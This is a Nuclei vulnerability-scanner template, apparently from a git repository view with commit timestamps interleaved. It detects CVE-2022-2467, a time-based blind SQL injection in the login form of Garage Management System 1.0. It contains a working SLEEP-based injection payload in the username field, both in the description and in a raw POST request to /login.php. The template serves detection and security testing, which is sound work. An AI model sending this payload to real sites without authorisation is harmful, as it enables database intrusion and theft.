nuclei-templates/http/cves/2022/CVE-2022-2467.yaml

51 lines
1.7 KiB
YAML
Raw Normal View History

2022-10-01 10:23:03 +00:00
id: CVE-2022-2467
info:
name: Garage Management System 1.0 - SQL Injection
2022-10-01 10:23:03 +00:00
author: edoardottt
severity: critical
description: |
Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-10-01 10:23:03 +00:00
reference:
- https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md
2022-10-04 09:27:40 +00:00
- https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html
2022-10-01 10:23:03 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-10-01 10:23:03 +00:00
cve-id: CVE-2022-2467
cwe-id: CWE-89
2023-07-11 19:49:27 +00:00
epss-score: 0.01501
cpe: cpe:2.3:a:garage_management_system_project:garage_management_system:1.0:*:*:*:*:*:*:*
2022-10-04 09:27:40 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: garage_management_system_project
product: garage_management_system
2022-10-05 07:50:00 +00:00
tags: cve,cve2022,sourcecodester,garagemanagementsystem,sqli
2022-10-01 10:23:03 +00:00
http:
2022-10-01 10:23:03 +00:00
- raw:
- |
2022-10-05 07:50:00 +00:00
@timeout: 10s
2022-10-01 10:23:03 +00:00
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-10-04 09:27:40 +00:00
username=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334
2022-10-01 10:23:03 +00:00
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=5'
2022-10-04 09:27:40 +00:00
- type: word
part: body
words:
- 'Garage Billing Software'
2022-10-01 10:23:03 +00:00
- type: status
status:
2022-10-01 13:48:34 +00:00
- 200